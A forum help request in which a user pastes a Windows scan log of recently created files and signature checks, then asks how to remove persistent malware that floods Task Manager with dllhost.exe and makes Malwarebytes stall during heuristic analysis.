C:\Users\Victoria\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IVMP2014-09-14 03:13 - 2013-05-13 20:30 - 00000000 ____D () C:\Program Files (x86)\IVMP2014-09-14 02:24 - 2014-09-14 02:23 - 11194928 _____ (SurfRight B.V.) C:\Users\Victoria\Downloads\HitmanPro_x64.exe2014-09-14 02:23 - 2014-09-14 02:22 - 10280824 _____ (SurfRight B.V.) C:\Users\Victoria\Downloads\HitmanPro.exe2014-09-14 02:21 - 2014-01-15 22:03 - 00000000 ___HD () C:\ProgramData\sacache2014-09-14 01:40 - 2014-01-18 18:06 - 00000212 ____H () C:\ProgramData\emopts.dat2014-09-14 01:30 - 2014-09-14 01:30 - 01373475 _____ () C:\Users\Victoria\Downloads\AdwCleaner.exe2014-09-14 00:35 - 2014-09-14 00:34 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-09-14 00:15 - 2014-09-14 00:15 - 00321848 _____ (Malwarebytes Corporation) C:\Users\Victoria\Downloads\mbam-clean-2.1.1.1001.exe2014-09-13 20:47 - 2014-09-13 20:46 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012.exe2014-09-13 18:01 - 2014-02-18 15:17 - 00000000 ____D () C:\Users\Victoria\Desktop\rat users info2014-09-13 17:34 - 2014-02-05 15:32 - 03186583 ____H () C:\ProgramData\sys005.log2014-09-13 17:34 - 2014-02-05 15:32 - 00849078 ____H () C:\ProgramData\sys011.log2014-09-13 17:34 - 2014-02-05 15:32 - 00509698 ____H () C:\ProgramData\sys002.log2014-09-13 17:34 - 2014-02-05 15:32 - 00005555 ____H () C:\ProgramData\sys012.log2014-09-13 17:34 - 2014-02-05 15:32 - 00000123 ____H () C:\ProgramData\sys006.log2014-09-13 17:34 - 2014-01-15 22:04 - 00100372 ____H () C:\ProgramData\sys004.log2014-09-13 15:22 - 2014-09-13 15:22 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT (1).exe2014-09-13 05:46 - 2014-09-13 05:46 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\Yxenpeb2014-09-13 01:53 - 2014-09-13 01:38 - 00000000 ____D () C:\Users\Victoria\Desktop\9000+ Icon Pack2014-09-13 01:32 - 2014-09-13 00:58 - 475068837 _____ () C:\Users\Victoria\Downloads\9000+ Icon Pack.rar2014-09-12 18:01 - 2014-05-08 05:04 - 00000000 ____D () C:\Users\Victoria\Desktop\New folder (5)2014-09-11 13:38 - 2013-02-03 12:36 - 00002145 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-09-11 05:52 - 2014-09-01 15:32 - 00000000 ____D () C:\Users\Victoria\Desktop\Data Protector V22014-09-11 05:48 - 2014-09-11 05:48 - 16487046 _____ () C:\Users\Victoria\Downloads\Protect your Bytes.rar2014-09-11 05:02 - 2012-11-30 11:15 - 00000000 ____D () C:\Users\Victoria\Desktop\Nard's Music Collection2014-09-10 21:18 - 2014-09-07 13:37 - 00000467 _____ () C:\Users\Victoria\Desktop\8C1A0000.log2014-09-10 16:57 - 2012-05-20 02:26 - 00000000 ____D () C:\Windows\System32\Tasks\NCH Software2014-09-10 16:46 - 2014-09-10 16:46 - 00007168 __RSH () C:\Users\Victoria\AppData\Roaming\{00007DD8-641C-73CB-7D97-6695673F7C6A}.exe2014-09-10 15:28 - 2012-03-31 11:27 - 19321344 ___SH () C:\Users\Victoria\Desktop\Thumbs.db2014-09-10 15:24 - 2014-09-10 15:24 - 00323696 _____ (Dropbox, Inc.) C:\Users\Victoria\Downloads\DropboxInstaller (3).exe2014-09-10 14:53 - 2014-09-10 14:53 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT.exe2014-09-10 14:53 - 2014-09-10 14:53 - 00000000 ____D () C:\Windows\ERUNT2014-09-09 17:34 - 2014-09-09 17:34 - 00001168 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Burn Disc Burning Software.lnk2014-09-09 17:34 - 2014-09-09 17:34 - 00001112 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoPad Video Editor.lnk2014-09-09 17:33 - 2014-09-09 17:33 - 01563200 _____ (NCH Software) C:\Users\Victoria\Downloads\debutsetup.exe2014-09-09 17:33 - 2014-09-09 17:33 - 00001202 _____ () C:\Users\Public\Desktop\NCH Suite.lnk2014-09-09 17:33 - 2014-09-09 17:33 - 00001076 _____ () C:\Users\Public\Desktop\Debut Video Capture Software.lnk2014-09-09 17:33 - 2014-01-04 02:07 - 00001088 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debut Video Capture Software.lnk2014-09-09 16:15 - 2014-08-02 13:39 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox2014-09-09 16:15 - 2013-02-01 12:07 - 00000000 ____D () C:\Users\Victoria\AppData\Local\CRE2014-09-09 16:06 - 2014-09-09 16:06 - 01370467 _____ () C:\Users\Victoria\Downloads\adwcleaner_3.309.exe2014-09-09 15:52 - 2011-10-19 21:24 - 00016152 _____ () C:\Windows\system32\Drivers\SWDUMon.sys2014-09-07 17:41 - 2014-09-07 17:41 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\WinRAR2014-09-07 17:40 - 2014-09-07 17:40 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\WinZip2014-09-07 17:38 - 2014-09-07 17:38 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Dell2014-09-07 17:37 - 2014-09-07 17:37 - 00087632 _____ () C:\Users\TheGuest\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\DAEMON Tools Pro2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\ATI2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Atheros2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Apple Computer2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Wondershare2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Stardock_Corporation2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\ATI2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\antiphishing-vmninternethelper1_1dn2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Adobe2014-09-07 17:37 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Real2014-09-07 17:37 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\VirtualStore2014-09-07 17:37 - 2014-02-05 15:32 - 00090005 ____H () C:\ProgramData\sys001.log2014-09-07 17:36 - 2014-09-07 17:36 - 00001472 _____ () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk2014-09-07 17:36 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Adobe2014-09-07 17:36 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Google2014-09-07 17:36 - 2014-09-07 17:35 - 00000000 ____D () C:\Users\TheGuest2014-09-07 17:35 - 2014-09-07 17:35 - 00000020 ___SH () C:\Users\TheGuest\ntuser.ini2014-09-07 13:39 - 2014-09-07 13:39 - 00000000 ____D () C:\Users\Victoria\Desktop\Settings2014-09-07 13:38 - 2014-09-01 16:21 - 00000000 ____D () C:\Users\Victoria\Desktop\Plugins2014-09-07 13:37 - 2014-09-07 13:37 - 00009216 _____ () C:\Users\Victoria\Desktop\LZLoader.dll2014-09-07 13:37 - 2014-09-01 16:20 - 00018432 _____ () C:\Users\Victoria\Desktop\ServerPlugin.dll2014-09-07 13:37 - 2014-09-01 16:20 - 00016384 _____ () C:\Users\Victoria\Desktop\ClientPlugin.dll2014-09-07 13:37 - 2014-09-01 16:20 - 00000000 ____D () C:\Users\Victoria\Desktop\Resources2014-09-07 13:37 - 2014-03-29 05:00 - 00000229 _____ () C:\Users\Victoria\Desktop\README.txt2014-09-06 18:02 - 2014-09-06 18:02 - 00018432 _____ () C:\Users\Victoria\Downloads\ServerPlugin.dll2014-09-06 18:02 - 2014-09-06 18:02 - 00000000 ____D () C:\Users\Victoria\Downloads\Plugins2014-09-06 18:02 - 2014-06-30 14:01 - 00000229 _____ () C:\Users\Victoria\Downloads\Readme.txt2014-09-06 18:01 - 2014-09-06 18:01 - 00016384 _____ () C:\Users\Victoria\Downloads\ClientPlugin.dll2014-09-06 18:01 - 2014-06-30 14:01 - 00000058 _____ () C:\Users\Victoria\Downloads\8C1A0000.log2014-09-06 15:02 - 2014-09-06 15:02 - 00000000 _____ () C:\Windows\setuperr.log2014-09-05 23:26 - 2014-06-28 14:11 - 00000000 ____D () C:\Program Files\CCleaner2014-09-03 14:58 - 2014-09-03 14:58 - 00000286 _____ () C:\Windows\wininit.ini2014-09-02 22:19 - 2014-09-02 21:58 - 00000164 _____ () C:\Users\Victoria\Desktop\ss.txt2014-09-02 16:26 - 2014-03-10 13:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trusteer Endpoint Protection2014-09-02 03:07 - 2013-10-05 16:52 - 00000000 ____D () C:\Users\Victoria\Documents\ConvertXtoDVD2014-09-01 16:33 - 2014-09-01 16:23 - 00000008 _____ () C:\Users\Victoria\Desktop\settings.bin2014-09-01 16:33 - 2014-09-01 16:22 - 00004656 _____ () C:\Users\Victoria\Desktop\server.log2014-09-01 16:33 - 2014-09-01 16:21 - 00000000 ____D () C:\Users\Victoria\Desktop\Databases2014-09-01 16:25 - 2014-09-01 16:22 - 00001103 _____ () C:\Users\Victoria\Desktop\builder.log2014-09-01 16:23 - 2014-09-01 16:22 - 00000112 _____ () C:\Users\Victoria\Desktop\plugins.bin2014-09-01 16:22 - 2014-09-01 16:22 - 00000048 _____ () C:\Users\Victoria\Desktop\public.bin2014-09-01 16:20 - 2014-09-01 16:20 - 00262144 _____ (http://system.data.sqlite.org/) C:\Users\Victoria\Desktop\System.Data.SQLite.dll 2014-09-01 16:20 - 2014-09-01 16:20 - 00026197 _____ () C:\Users\Victoria\Desktop\ServerPlugin.xml2014-09-01 16:20 - 2014-09-01 16:20 - 00008366 _____ () C:\Users\Victoria\Desktop\ClientPlugin.xml2014-09-01 16:20 - 2014-09-01 16:20 - 00000028 _____ () C:\Users\Victoria\Desktop\E8250000.log2014-09-01 16:20 - 2014-09-01 16:20 - 00000000 ____D () C:\Users\Victoria\Desktop\x642014-09-01 16:19 - 2014-06-30 13:53 - 00000000 ____D () C:\ProgramData\Nimoru2014-08-31 21:17 - 2014-08-31 17:37 - 00000057 _____ () C:\Users\Victoria\Desktop\96380000.log2014-08-31 19:24 - 2014-08-31 19:24 - 00000017 _____ () C:\Users\Victoria\Desktop\Password.txt2014-08-31 18:59 - 2014-08-31 18:56 - 08536806 _____ () C:\Users\Victoria\Desktop\download.mp42014-08-31 18:47 - 2014-08-31 18:47 - 00160789 _____ () C:\Users\Victoria\Downloads\n-west-w-1776.zip2014-08-29 17:13 - 2014-08-29 17:13 - 00000000 __SHD () C:\Users\Victoria\AppData\Roaming\Eziriz2014-08-29 17:09 - 2014-08-29 17:09 - 00001530 _____ () C:\Users\Victoria\Desktop\info1.txt2014-08-29 15:47 - 2014-08-29 15:29 - 00409600 _____ () C:\database.mdb2014-08-29 15:47 - 2014-08-29 15:29 - 00000000 ____D () C:\Maps2014-08-29 15:28 - 2014-08-29 15:28 - 00000000 ____D () C:\Users\Victoria\AppData\Local\IsolatedStorage2014-08-29 15:26 - 2014-08-29 14:53 - 00000174 _____ () C:\Users\Victoria\Desktop\D4300000.log2014-08-26 10:34 - 2014-08-26 10:34 - 00002670 _____ () C:\Windows\System32\Tasks\AVG-Secure-Search-Update_0814tb_rmv2014-08-26 10:34 - 2014-08-26 10:34 - 00002668 _____ () C:\Windows\System32\Tasks\AVG-Secure-Search-Update_0814tb_rel2014-08-26 10:34 - 2014-08-26 10:34 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb2014-08-25 19:21 - 2014-04-11 19:24 - 00001871 _____ () C:\Users\Victoria\Desktop\Star Wars Knights of the Old Republic.lnk2014-08-25 04:16 - 2014-08-25 04:16 - 00664064 _____ () C:\Users\Victoria\Downloads\VPN Installer (4).exe2014-08-25 04:16 - 2014-07-04 03:24 - 00001012 _____ () C:\Users\Victoria\Desktop\Cryptic VPN.lnk2014-08-25 04:16 - 2014-06-14 02:34 - 00000000 ____D () C:\Program Files (x86)\CrypticVPN2014-08-25 04:16 - 2014-06-13 01:30 - 00462336 _____ (Dino Chiesa) C:\Users\Victoria\Downloads\Ionic.Zip.dll2014-08-16 00:37 - 2009-07-14 01:13 - 00783464 _____ () C:\Windows\system32\PerfStringBackup.INI Files to move or delete:====================C:\ProgramData\emopts.datC:\ProgramData\saopts.dat Some content of TEMP:====================C:\Users\TheGuest\AppData\Local\Temp\upnp.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-09-08 01:23 ==================== End Of Log ============================

i have tried junkware removal tool,adware cleaner, eset nod,hitmanpro and malware byte. i still can't get rid of this malware. it's some type of malware that makes about 20-30 dllhost.exe show up in taskmngr and the computer and internet go slow. it also keeps making some virus called datamngr show up. i used malware bytes a couple days ago after eset and hitman pro both failed,and i thought it got rid of it,but nope. so i tried malware bytes again,and now it keeps getting stuck on heuristic analysis so i can't even use malware bytes now. please help

oh yeah and i have already used malware bytes removal tool and uninstalled and re-installed several times

i have a virus on my computer that i have been trying to get rid of using malware bytes. it said 257 threats found. but the scan is never able to finish. it constantly gets stuck at heuristic analysis. i left it there for 3 hours and it was still stuck there. i really need to see if malware bytes can get rid of this virus because eset and hitmanpro haven't been able to do the job. please help.